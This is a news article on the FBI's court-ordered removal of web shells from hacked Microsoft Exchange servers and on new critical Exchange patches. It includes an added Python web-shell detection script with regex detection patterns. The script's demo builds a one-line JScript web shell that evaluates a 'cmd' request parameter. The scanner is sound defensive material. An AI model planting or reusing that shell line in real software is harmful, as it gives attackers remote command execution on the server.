Trouble comes in twos

FBI gets court order to remove backdoors from Microsoft Exchange servers

A US court action has authorized government authorities to remove backdoors from compromised Microsoft Exchange servers.

From the start of the year until at least March 2, when Microsoft issued patches, hacking groups exploited zero-day vulnerabilities in Microsoft Exchange Server software to access email accounts and place web shells in order to maintain persistent access to compromised systems.

In an unusual move, the FBI was granted authority to remove these web shells (which acted like backdoors) from hacked Microsoft Exchange installations.

Removing the web shells meant interfering with computers owned by third parties, which might have been ruled unlawful without the court order.


This action deals with only part of the problem: compromised servers still need to be patched, and only then can further remedial steps be taken to detect other signs of compromise, restore systems, and expel attackers.

The action is therefore best considered as phase one of an ongoing clean-up operation.

“The FBI conducted the removal by issuing a command through the web shell to the server, which was designed to cause the server to delete only the web shell (identified by its unique file path),” a US Department of Justice (DoJ) statement explains.

The statement goes on to describe the copying (presumably for forensic purposes) and removal of web shells from hundreds of vulnerable computers.
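The detection step that the article says still falls to administrators is illustrated below with an added example; it is not code from the article, the DoJ or Microsoft. It scans a directory tree for ASP.NET pages that both read input from the HTTP request and hand it to a code-execution or process-spawning API, and optionally ignores files not modified since a cutoff date (here the start of 2021, when the article says exploitation began). The directory layout, file names, regex patterns and the two sample pages are all constructed for the demonstration; the one-line JScript page is a generic web-shell shape, not a sample recovered from this campaign.

```python
"""Heuristic web-shell scan for ASP.NET directories (added example).

Assumptions: a web shell reads attacker input via Request[...] and passes it to
eval(), Process/ProcessStartInfo, a PowerShell runspace or Assembly.Load. Legit
pages read Request constantly, so a file is flagged only when BOTH an input
pattern and an execution pattern are present.
"""
import re
import tempfile
from datetime import datetime, timezone
from pathlib import Path

# Patterns are assumptions for the demo, not an authoritative signature set.
INPUT_PATTERNS = [
    ("request-param",
     re.compile(r'Request(?:\.(?:Item|Form|QueryString|Headers))?\s*\[\s*"[^"]+"\s*\]')),
]
EXEC_PATTERNS = [
    ("jscript-eval", re.compile(r'\beval\s*\(')),
    ("process-start",
     re.compile(r'System\.Diagnostics\.Process(?:StartInfo)?|\bProcess\.Start\s*\(')),
    ("powershell-runspace",
     re.compile(r'System\.Management\.Automation|RunspaceFactory')),
    ("reflection-load", re.compile(r'Assembly\.Load\s*\(')),
]


def classify_file(text):
    """Return the matched indicator names, or [] if the file looks benign."""
    inputs = [name for name, rx in INPUT_PATTERNS if rx.search(text)]
    execs = [name for name, rx in EXEC_PATTERNS if rx.search(text)]
    return inputs + execs if inputs and execs else []


def scan_tree(root, modified_since=None, extensions=(".aspx", ".ashx", ".asmx")):
    """Walk `root` and report files whose content matches the shell heuristic.

    modified_since: timezone-aware datetime; files last modified before it are
    skipped, which narrows a large Exchange install to the exploitation window.
    """
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in extensions:
            continue
        stat = path.stat()
        if modified_since is not None:
            mtime = datetime.fromtimestamp(stat.st_mtime, tz=timezone.utc)
            if mtime < modified_since:
                continue
        try:
            text = path.read_text(encoding="utf-8", errors="ignore")
        except OSError:
            continue  # unreadable file: leave it for manual review
        hits = classify_file(text)
        if hits:
            findings.append({"path": str(path), "size": stat.st_size, "indicators": hits})
    return findings


# Constructed sample pages (not real Exchange files).
BENIGN_PAGE = (
    '<%@ Page Language="C#" %>\n<html><body>\n'
    '<% string user = Request["user"]; Response.Write(Server.HtmlEncode(user)); %>\n'
    '</body></html>\n'
)
SHELL_PAGE = (
    '<script language="JScript" runat="server">'
    'function Page_Load(){eval(Request["cmd"],"unsafe");}</script>\n'
)


def demo():
    """Build a throwaway tree with one benign page and one shell, then scan it."""
    with tempfile.TemporaryDirectory() as root:
        auth_dir = Path(root) / "owa" / "auth"      # layout is an assumption
        auth_dir.mkdir(parents=True)
        (auth_dir / "logon.aspx").write_text(BENIGN_PAGE)
        (auth_dir / "supp0rt.aspx").write_text(SHELL_PAGE)  # constructed shell name
        cutoff = datetime(2021, 1, 1, tzinfo=timezone.utc)
        return scan_tree(root, modified_since=cutoff)


if __name__ == "__main__":
    for finding in demo():
        print(f"{finding['path']} ({finding['size']} bytes): {', '.join(finding['indicators'])}")
```

The script only reports. Following the order the DoJ statement describes, an operator would copy each flagged file (with its metadata and the relevant IIS logs) for forensics before deleting it, and would treat the scan as a starting point rather than proof of a clean server: a shell that obfuscates its strings or lives under a non-ASP.NET extension will not match these patterns.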

Assistant Attorney General John Demers for the DoJ’s National Security Division, commented: “The court-authorized removal of the malicious web shells demonstrates the Department’s commitment to disrupt hacking activity using all of our legal tools, not just prosecutions.”


News of the court-authorized clean-up operation came on Tuesday (April 13), just hours before Microsoft announced separate patches to address two new Exchange Server vulnerabilities.

Both flaws (tracked as CVE-2021-28480 and CVE-2021-28481) pose a remote code execution risk to unpatched systems.

Worse yet, both bugs can be exploited without authentication or user interaction, and each carries a critical CVSS score of 9.8, close to the maximum of 10.

Dustin Childs of Trend Micro’s Zero Day Initiative, commented: “Since the attack vector is listed as ‘Network’, it is likely these bugs are wormable – at least between Exchange servers.”


Childs continued: “The CVSS score for these two bugs is actually higher than the Exchange bugs exploited earlier this year.

“These bugs were credited to the National Security Agency. Considering the source, and considering these bugs also receive Microsoft’s highest Exploit Index rating, assume they will eventually be exploited. Update your systems as soon as possible.”

Patch Tuesday

The Exchange patches were released as part of a bumper Spring edition of Microsoft’s regular monthly Patch Tuesday update cycle.

The April edition of Patch Tuesday included relief for a total of 114 vulnerabilities, 19 of which were critical.

No in-the-wild exploitation of the latest Exchange flaws has been reported, although a Win32k elevation-of-privilege vulnerability (CVE-2021-28310), a local bug rather than a remote one, is said to be under active attack.

The SANS Institute’s Internet Storm Center has published a full rundown of the patches in Microsoft’s April batch.
